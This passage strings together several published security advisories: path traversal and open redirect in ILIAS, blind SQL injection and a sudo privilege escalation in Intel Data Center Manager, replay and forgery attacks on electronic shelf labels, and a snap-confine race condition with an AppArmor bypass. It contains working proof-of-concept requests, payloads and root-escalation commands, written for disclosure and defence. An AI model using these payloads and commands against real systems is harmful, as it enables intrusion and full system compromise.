changing the value of<br />the "logFile" query parameter of the request, they can read arbitrary<br />files of the server's filesystem. For example, to read the passwd file<br />on Linux systems, an attacker can change the value of the parameter logfile<br />to "../../../../../../../../../etc/passwd".<br /><br /><br />4) Open Redirect - CVE-2022-45917<br />The shib_logout function is vulnerable to an open redirect.<br />A URL that successfully uses this vulnerability to redirect to<br />"https://www.sec-consult.com" is:<br /><br />http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The vulnerabilities were identified in ILIAS version 7.14.<br />However, a brief analysis of the source code suggests, that several<br />vulnerabilities are present in versions dating back to at least 3.8.4.<br />Hence it is assumed that most current versions of the product are affected.<br /><br />The vulnerabilities were partly fixed in version 7.15, a complete patch is<br />available with version 7.16.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-10-07: Contacting vendor through security@lists.ilias.de<br />2022-10-19: Sending initial email again, as the vendor did not yet respond<br />2022-10-25: Extending email recipients to info@ilias.de, datenschutz@ilias.de and<br /> identified personal email addresses from the vendor's website.<br />2022-10-25: Sending the advisory to the provided contact<br />2022-10-31: Vendor requests more information<br />2022-10-31: Sending detailed PoC<br />2022-11-10: Asking for current status<br />2022-11-22: Vendor confirms that patches will be available by 2022-11-26<br />2022-11-22: Asking about the version numbers of mentioned patches and CVE IDs<br />2022-11-23: Vendor provides information about patched versions; CVE IDs will be<br /> requested by SEC Consult<br />2022-11-24: Vendor releases patched version 7.16<br />2022-12-06: Public release of security advisory<br /><br /><br />Solution:<br />---------<br />Update ILIAS to version 7.16 or newer from the vendor's website:<br />https://docu.ilias.de/goto.php?target=st_229<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF A. Hartig, C. Schwarz, N. Schilling / @2022<br /><br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Intel Data Center Manager<br />Vendor URL: https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.html<br />Type: SQL Injection [CWE-89]<br />Date found: 2022-01-21<br />Date published: 2022-12-01<br />CVSSv3 Score: 9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)<br />CVE: CVE-2022-21225<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Intel Data Center Manager 4.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Energy costs are the fastest rising expense for today’s data centers. Intel® Data<br />Center Manager (Intel® DCM) provides real-time power and thermal consumption data,<br />giving you the clarity you need to lower power usage, increase rack density, and<br />prolong operation during outages.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />Intel DCM's endpoint at "/DcmConsole/DataAccessServlet?action=getRoomRackData" is<br />vulnerable to an authenticated, blind SQL Injection when user-supplied input to<br />the HTTP POST parameter "dataName" is processed by the web application.<br /><br />Since the application does not properly validate and sanitize this parameter, an<br />attacker can inject arbitrary SQL commands against the PostgreSQL backend<br />database server of the web application.<br /><br />Successful exploits can allow an authenticated attacker (the lowest possible<br />authorization level "Guest" is sufficient) to read and modify database contents<br />and execute any system commands on the underlying operating system. This way,<br />the attacker can compromise the system's entire confidentiality, integrity, and<br />availability.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />POST /DcmConsole/DataAccessServlet?action=getRoomRackData HTTP/1.1<br />Host: [ip-address]<br />Cookie: JSESSIONID=[session-id]<br />Content-Length: 153<br />Accept: application/json, text/plain, */*<br />Content-Type: text/plain<br />User-Agent: Mozilla/5.0<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Connection: close<br /><br />{"antiCSRFId":"[your-anti-csrf-id]","requestObj":{"snapshotId":1,"roomId":1,"dataName":"test');SELECT PG_SLEEP(5)--"}}<br /><br />(see the referenced blog post for more details)<br /><br /><br />7. SOLUTION<br />===========<br />Update at least to version 5.0.0.46307.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-01-21: Discovery of the vulnerability<br />2022-01-21: Reported to vendor via their bug bounty program<br />2022-01-21: Vendor response: Sent to "appropriate reviewers"<br />2022-02-08: Vendor acknowledges the vulnerability with a severity of "medium" without sharing their CVSS calculation<br />2022-02-15: Endless back-and-forth discussions about the rating. Vendor proposes a rating of 6.8<br />2022-02-16: I don't accept the rating because the vendor downplayed it<br />2022-02-25: After discussions, vendor rates issue as CVSS 9.0 (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)<br />2022-02-25: Apparently AV:A is still wrong, but I don't have more energy to fight them. However this advisory contains the proper CVSS rating.<br />2022-xx-xx: Vendor releases version 5.0.0.46307 which includes the fix<br />2022-08-09: Vendor releases advisory INTEL-SA-00662<br />2022-12-01: Public disclosure<br /><br /><br />9. REFERENCES<br />==============<br />https://www.rcesecurity.com/2022/12/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225/<br />https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00662.html<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Intel Data Center Manager<br />Vendor URL: https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.html<br />Type: Incorrect Use of Privileged APIs [CWE-648]<br />Date found: 2022-07-16<br />Date published: 2022-12-07<br />CVSSv3 Score: 7.4 (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)<br />CVE: -<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Intel Data Center Manager 5.1 (latest) and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Energy costs are the fastest rising expense for today’s data centers. Intel® Data<br />Center Manager (Intel® DCM) provides real-time power and thermal consumption data,<br />giving you the clarity you need to lower power usage, increase rack density, and<br />prolong operation during outages.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The latest version (5.1) and all prior versions of Intel's DCM are vulnerable to a<br />local privileges escalation vulnerability using the application user "dcm" used to<br />run the web application and the rest interface. An attacker who gained RCE using<br />this dcm user (i.e., through Log4j) is then able to escalate their privileges to<br />root by abusing a weak Sudo configuration for the "dcm" user:<br /><br />dcm ALL=(ALL) NOPASSWD:/usr/local/bin/SDPTool<br />dcm ALL=(ALL) NOPASSWD:/usr/bin/cp<br />dcm ALL=(ALL) NOPASSWD:/usr/bin/chmod<br /><br />The Intel Server Debug and Provisioning Tool (SDP Tool) must be installed for the<br />Data Center Manager to be vulnerable. Successful exploits can allow an authenticated<br />attacker to execute commands as root. In this way, the attacker can compromise the<br />victim system's entire confidentiality, integrity, and availability, thereby allowing<br />to persist within the attached network.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />Just one way of exploitation is by replacing the current sudoers configuration:<br /><br />1.Create a new sudoers configuration file using the compromised "dcm" user in i.e. /tmp/<br />2.sudo chmod 440 /tmp/sudoers<br />3.sudo cp sudoers /etc/sudoers<br />4.sudo /bin/bash<br /><br /><br />7. SOLUTION<br />===========<br />None. Intel thinks that this is not a vulnerability and therefore does also not assign<br />a CVE for it.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-07-16: Discovery of the vulnerability<br />2022-07-16: Reported to vendor via their bug bounty program<br />2022-07-18: Vendor response: Sent to "appropriate reviewers"<br />2022-07-26: Vendor states that the vulnerability "depends on something that does not exist (eg; RCE)."<br />2022-07-26: Sent a clarification that a compromise of the "dcm" account is indeed necessary, but there have been RCEs in the past (i.e. through Log4j)<br />2022-09-22: Vendor has troubles to reproduce the bug and asks for another PoC<br />2022-09-22: Sent a clarification about the PoC<br />2022-09-22: Vendor states that the report "does not clearly demonstrate a vulnerability in DCM" and the report will be closed.<br />2022-09-23: Provided the vendor with a PoC utilizing Log4shell (CVE-2021-44228) in a former version of DCM<br />2022-10-10: Vendor asks whether the Log4shell bug is still reproducible in the latest version of DCM<br />2022-10-10: Made clear that Log4shell is not the point about the report<br />2022-10-11: Vendor states "We do not clearly see a a vulnerability demonstrated in DCM"<br />2022-10-12: [Back and forth about the provided PoCs]<br />2022-10-12: I'm giving up.<br />2022-12-07: Public disclosure<br /><br /><br />9. REFERENCES<br />==============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221201-0 ><br />=======================================================================<br /> title: Replay attacks & Displaying arbitrary contents<br /> product: Zhuhai Suny Technology ESL Tag / ETAG-TECH protocol<br /> (electronic shelf labels)<br /> vulnerable version: All<br /> fixed version: -<br /> CVE number: CVE-2022-45914<br /> impact: critical<br /> homepage: http://www.zhsuny.com/<br /> found: 2022-05-27<br /> by: Steffen Robertz (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Zhuhai Suny Technology Co., Ltd, founded in 2016 and located in Zhuhai<br />Guangdong, is the manufacturer of electronic shelf labels and Alibaba<br />Super Key Account Gold Supplier specializing in ESL with over 10 years’<br />experiences focusing on helping customers reduce cost and boost sales.<br /><br />Since its founding, Suny has attached great importance to exploring<br />both international and domestic markets, thus becoming China’s top 1<br />manufacturer of electronic shelf labels. Its products have been widely<br />applied in supermarkets, retail stores, pharmacies, warehouses,<br />exhibitions, etc. We has currently provided services to customers from<br />more than 180 countries, and total sales in 2020 have exceeded<br />15 million US dollars."<br /><br />Source: http://www.zhsuny.com/profile/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor did not respond to our communication attempts, there is no patch<br />available. In case you are using the product, contact the vendor and urge<br />them to fix the security vulnerabilities.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br />The research has also been presented at various security conferences such as<br />hardwear.io, named "Self-labeling electronic shelf labels".<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Replay Attack<br />The displayed information on the price tag can be updated via a 433 MHz<br />custom protocol (called ETAG-TECH). An attacker can record transmitted<br />RF samples and replay them later to cause the same action. Thus, it is<br />possible to restore an older price on the tag without the need for any<br />information about the protocol or tag.<br /><br /><br />2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)<br />The ETAG-TECH protocol was reverse engineered. It was noted, that no<br />authentication is existent. Hence, one can display arbitrary content<br />on the electronic tag by simply transmitting messages according to the<br />protocol.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Replay Attack<br />The tag and base station communicate at 433.264 MHz. Thus, the following<br />HackRF command can be used to record a transmission:<br />hackrf_transfer -r /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20<br /><br />The following command was used in order to replay the signal:<br />hackrf_transfer -t /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20<br /><br /><br />A video of the attack has been published here: https://youtu.be/hj_ao25HU1E<br /><br /><br />2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)<br />The base station will transmit a compressed image to the tag. Thus,<br />any content can be displayed.<br /><br />Following steps will have to happen:<br /> I) Send wake-up frames to the tag.<br /> II) Compress the picture that should be displayed.<br /> III) Wrap the compressed picture into the picture data structure.<br /> IV) Split the data structure into the image frames.<br /> V) Listen for the tag's response.<br /><br />I) The Wake-up Frame:<br />The CRC is calculated over the whole frame, starting with the frame length<br />field. The frame counter is counting down to zero. Every unique frame<br />(=unique frame counter) is sent five times. The frame is transmitted at<br />175 kBaud.<br /><br />| Preamble | Sync Header | Frame Length | Tag ID | Fixed Value | Frame Counter | Fixed Value | CRC16 |<br />|------------------|-------------|--------------|--------|-------------|---------------|-------------|-------|<br />| AAAAAAAAAAAAAAAA | D391D391 | 08 | 065302 | 0000 | 0398 | 0A | CRC |<br /><br /><br />II) The Compression Algorithm:<br />Runlength encoding is used as compression algorithm. The image is read in<br />rows. An "a" stands for either a 1 or 0, depending on if it's a run of<br />ones or zeros that is being encoded. A "c" stands for the length of the<br />run.<br /><br />There are four different cases:<br /><br />Case 1: Less than 8 consecutive bits<br />0b1aaaaaaa<br />Case 2: Less than 32 consecutive bits<br />0b0acccccc<br />Case 3: Less than 256 consecutive bits<br />0b1a000000 0bcccccccc<br />Case 4: Less than 2^16 consecutive bits<br />0b0a000000 0bcccccccc 0bcccccccc<br /><br />III) The picture data structure<br />The compression header indicates the color channel:<br />FC00000000 = black<br />FC80000000 = red<br /><br />| LED | Batch Code | Fixed Value | LED Time | Compression header | Display Height | Display Width | Compressed Image Data |<br />|---------|------------|-------------|----------|--------------------|----------------|---------------|-------------------------|<br />| 0700 | BF75 | 00ED | 000A | FC00000000 | 007F | 0127 | <Compressed Image Data> |<br /><br />IV) The Image Frames<br />Image frames can only hold 54 Bytes of data. Thus the previously generated<br />image data structure is split into chunks of 54 bytes or less.<br />The CRC is calculated over the whole frame, starting with the frame length<br />field. The frame counter indicates frame 1 out of 9. The frame is transmitted<br />at 100 kBaud.<br /><br />| Preamble | Sync Header | Frame Length | Tag ID | Frame Counter | Fixed Value | Payload | CRC16 |<br />|------------------|-------------|--------------|--------|---------------|-------------|------------------------|-------|<br />| AAAAAAAAAAAAAAAA | D391D391 | 08 | 065302 | 0901 | 33 | <Image Data Structure> | CRC |<br /><br /><br />V) The Tag's Response<br />The frame is transmitted at 100 kBaud and repeated three times.<br /><br />| Preamble | Sync Header | Frame Length | Tag ID | Battery Voltage | RSSI | Temperature | CRC16 |<br />|------------------|-------------|--------------|--------|-----------------|-------------|-------------|-------|<br />| AAAAAAAAAAAAAAAA | D391D391 | 07 | 065302 | 1D = 2.9V | 2068 | E9 = 23.3C | CRC |<br /><br /><br />Following these steps, custom images can be sent over the ETAG-TECH protocol.<br />The only required information is the tag ID which is printed on the tag.<br />Otherwise it can be sniffed by listening to the RF interface and waiting for base<br />station communication. Thus, the tag can be fully controlled by an attacker.<br /><br />Videos of the attack have been published here:<br />* Displaying arbitrary tag contents: https://youtu.be/028Gn4VC8yE<br />* Receiving arbitrary ESL-TECH messages: https://youtu.be/x7t0QViu2gU<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />No version information could be identified for this product.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-08-14: Contacting vendor through info@zhsuny.com.cn and zhsuny@yeah.net<br /> No response.<br />2022-08-27: Contacting vendor through st@zhsuny.com.cn, no response.<br />2022-09-12: Contacting vendor again, communicating public release for October<br /> No response.<br />2022-12-01: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor did not respond to our communication attempts, there is no patch<br />available. In case you are using the product, contact the vendor and urge them<br />to fix the security vulnerabilities.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Robertz / @2022<br /><br /></code></pre>
<pre><code><br />Qualys Security Advisory<br /><br />Race condition in snap-confine's must_mkdir_and_open_with_perms()<br />(CVE-2022-3328)<br /><br /><br />========================================================================<br />Contents<br />========================================================================<br /><br />Summary<br />Background<br />Exploitation<br />Acknowledgments<br />Timeline<br /><br /> I can't help but feel a missed opportunity to integrate lyrics from<br /> one of the best songs ever: [SNAP! - The Power (Official Video)]<br /> -- https://twitter.com/spendergrsec/status/1494420041076461570<br /><br /><br />========================================================================<br />Summary<br />========================================================================<br /><br />We discovered a race condition (CVE-2022-3328) in snap-confine, a<br />SUID-root program installed by default on Ubuntu. In this advisory, we<br />tell the story of this vulnerability (which was introduced in February<br />2022 by the patch for CVE-2021-44731) and detail how we exploited it in<br />Ubuntu Server (a local privilege escalation, from any user to root) by<br />combining it with two vulnerabilities in multipathd (an authorization<br />bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):<br /><br />https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt<br /><br /><br />========================================================================<br />Background<br />========================================================================<br /><br /> Like the crack of the whip, I Snap! attack<br /> Radical mind, day and night all the time<br /> -- SNAP! - The Power<br /><br />In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory<br />(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):<br />to set up a snap's sandbox, snap-confine created the temporary directory<br />/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did<br />not belong to root; a local attacker could race against snap-confine,<br />retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full<br />root privileges.<br /><br />This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:<br />Prevent user-controlled race in setup_private_mount"), which introduced<br />a new helper function, must_mkdir_and_open_with_perms():<br /><br />------------------------------------------------------------------------<br />142 static void setup_private_mount(const char *snap_name)<br />...<br />169 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);<br />...<br />176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);<br />------------------------------------------------------------------------<br /> 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,<br /> 56 mode_t mode)<br /> ..<br /> 61 mkdir:<br /> ..<br /> 67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) {<br /> ..<br /> 70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);<br /> ..<br /> 81 if (fstat(fd, &st) < 0) {<br /> ..<br /> 84 if (st.st_uid != uid || st.st_gid != gid<br /> 85 || st.st_mode != (S_IFDIR | mode)) {<br />...<br />130 if (rename(dir, random_dir) < 0) {<br />...<br />135 goto mkdir;<br />------------------------------------------------------------------------<br /><br />- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if<br /> it does not exist already;<br /><br />- if it already exists, and if it does not belong to root (at line 84),<br /> then it is moved out of the way (at line 130) by rename()ing it to a<br /> random directory in /tmp, and its creation is retried (at line 135).<br /><br />When we reviewed this patch back in December 2021, we felt very nervous<br />about this rename() call (because it allows a local attacker to rename()<br />a directory they do not own), and we advised the Ubuntu Security Team to<br />either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create<br />it in a non-world-writable directory instead of /tmp, or at least to use<br />renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of<br />these ideas were deemed impractical (for example, renameat2() is not<br />supported by older kernel and glibc versions); moreover, we (Qualys)<br />failed to come up with a feasible attack plan against this rename()<br />call, so the patch was kept in its current form.<br /><br />After the release of Ubuntu 22.04 in April 2022, we decided to revisit<br />snap-confine and its recent hardening changes, and we finally found a<br />way to exploit the rename() call in must_mkdir_and_open_with_perms().<br /><br /><br />========================================================================<br />Exploitation<br />========================================================================<br /><br /> It's getting, it's getting, it's getting kinda heavy<br /> It's getting, it's getting, it's getting kinda hectic<br /> -- SNAP! - The Power<br /><br />The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:<br /><br />1/ snap-confine operates in /tmp to create a snap's temporary directory<br />(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in<br />/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in<br />sc_bootstrap_mount_namespace(), where all of the Xs are randomized by<br />mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap<br />instance name by sc_instance_name_validate() (when all of the Xs are<br />lowercase alphanumeric):<br /><br />------------------------------------------------------------------------<br />286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)<br />...<br />288 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";<br />...<br />291 if (mkdtemp(scratch_dir) == NULL) {<br />...<br />303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);<br />...<br />319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,<br />...<br />331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;<br />...<br />342 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,<br />343 mnt->path);<br />...<br />352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,<br />------------------------------------------------------------------------<br /><br />2/ We therefore execute two instances of snap-confine in parallel:<br /><br />- we block the first snap-confine immediately after it creates its root<br /> directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this<br /> race condition by "single-stepping" snap-confine, as explained in our<br /> "Lemmings" advisory);<br /><br />- we execute the second snap-confine with a snap instance name of<br /> rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of<br /> this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX<br /> of the first snap-confine;<br /><br />- we kill this second snap-confine immediately after it rename()s its<br /> temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory<br /> /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we<br /> reliably win this race condition with inotify, as explained in our<br /> "Lemmings" advisory);<br /><br />- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and<br /> resume the execution of the first snap-confine, whose root directory<br /> now belongs to us.<br /><br />3/ We can therefore create an arbitrary symlink<br />/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will<br />bind-mount the real /tmp directory (which is world-writable) onto any<br />directory in the filesystem (because mount() will follow our arbitrary<br />symlink at line 352).<br /><br />This ability will eventually allow us to obtain full root privileges,<br />but we must first solve three problems:<br /><br />------------------------------------------------------------------------<br />Problem a/ We cannot trick snap-confine into rename()ing<br />/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and<br />must_mkdir_and_open_with_perms() rename()s it only if it does not belong<br />to root!<br /><br />This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX<br />belongs to the user root, but it belongs to the group of our own user,<br />so must_mkdir_and_open_with_perms() rename()s it because it does not<br />belong to the group root (at line 84).<br /><br />------------------------------------------------------------------------<br />Problem b/ We cannot trick snap-confine into following our symlink<br />/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()<br />bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line<br />319): if we create our symlink before this bind-mount, then it becomes<br />covered by the squashfs; and we cannot create our symlink after this<br />bind-mount, because the squashfs is read-only and belongs to root!<br /><br />The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"<br />of our "Lemmings" advisory suggests a solution to this problem: we must<br />unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()<br />bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used<br />in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,<br />but we found a surprisingly simple workaround:<br /><br />we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately<br />after we re-create this directory ourselves; this allows us to unmount<br />(with fusermount -u -z) any subsequent bind-mounts (even if they belong<br />to root), because fusermount does not check that our FUSE filesystem is<br />indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.<br /><br />------------------------------------------------------------------------<br />Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp<br />onto an arbitrary directory in the filesystem (at line 352), because<br />such a bind-mount is forbidden by snap-confine's AppArmor profile!<br /><br />To solve this problem, we must bypass AppArmor completely, but the<br />technique we used in our "Lemmings" advisory (we wrapped snap-confine's<br />execution in an AppArmor profile that was in "complain" mode, not in<br />"enforce" mode) was patched in February 2022 (by commits 26eed65 and<br />4a2eb78, "ensure that snap-confine is in strict confinement" and<br />"Tighten AppArmor label check"):<br /><br />now, snap-confine's execution must be wrapped in an AppArmor profile<br />that is in "enforce" mode and whose label matches the regular expression<br />"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".<br /><br />We were about to give up on trying to exploit snap-confine, when we<br />discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is<br />installed by default on Ubuntu Server): these two vulnerabilities allow<br />us to create a directory named "failed_wwids" (user root, group root,<br />mode 0700) anywhere in the filesystem, and we were able to transform<br />this very limited directory creation into a complete AppArmor bypass.<br /><br />AppArmor supports policy namespaces that are loosely related to kernel<br />user namespaces; by default, no AppArmor namespaces exist:<br /><br />------------------------------------------------------------------------<br />$ ls -la /sys/kernel/security/apparmor/policy/namespaces<br />total 0<br />drwxr-xr-x 2 root root 0 Aug 6 12:42 .<br />drwxr-xr-x 5 root root 0 Aug 6 12:42 ..<br />------------------------------------------------------------------------<br /><br />However, we (attackers) can create an AppArmor namespace "failed_wwids"<br />by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:<br /><br />------------------------------------------------------------------------<br />$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath<br /><br />$ multipathd list devices | grep 'whitelisted, unmonitored'<br /> sda1 devnode whitelisted, unmonitored<br /> ...<br /><br />$ multipathd list list path sda1<br />fail<br /><br />$ ls -la /sys/kernel/security/apparmor/policy/namespaces<br />total 0<br />drwxr-xr-x 3 root root 0 Aug 6 12:42 .<br />drwxr-xr-x 5 root root 0 Aug 6 12:42 ..<br />drwx------ 5 root root 0 Aug 6 13:38 failed_wwids<br />------------------------------------------------------------------------<br /><br />Then, we can enter this AppArmor namespace by creating and entering an<br />unprivileged user namespace:<br /><br />------------------------------------------------------------------------<br />$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh<br />------------------------------------------------------------------------<br /><br />Inside this namespace, we can create an AppArmor profile labeled<br />"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all<br />possible operations:<br /><br />------------------------------------------------------------------------<br /># apparmor_parser -K -a << "EOF"<br />/usr/lib/snapd/snap-confine (enforce) {<br />capability,<br />network,<br />mount,<br />remount,<br />umount,<br />pivot_root,<br />ptrace,<br />signal,<br />dbus,<br />unix,<br />file,<br />change_profile,<br />}<br />EOF<br />------------------------------------------------------------------------<br /><br />Back in the initial namespace, we check that our "allow all" AppArmor<br />profile still exists:<br /><br />------------------------------------------------------------------------<br /># aa-status<br />apparmor module is loaded.<br />32 profiles are loaded.<br />32 profiles are in enforce mode.<br /> ...<br /> :failed_wwids:/usr/lib/snapd/snap-confine<br />------------------------------------------------------------------------<br /><br />Last, we make sure that snap-confine accepts our "allow all" AppArmor<br />profile (i.e., AppArmor is bypassed, and snap-confine is effectively<br />unconfined):<br /><br />------------------------------------------------------------------------<br />$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent<br />...<br />DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine<br />DEBUG: apparmor mode is: enforce<br />------------------------------------------------------------------------<br /><br />We can therefore bind-mount /tmp onto an arbitrary directory in the<br />filesystem (by exploiting 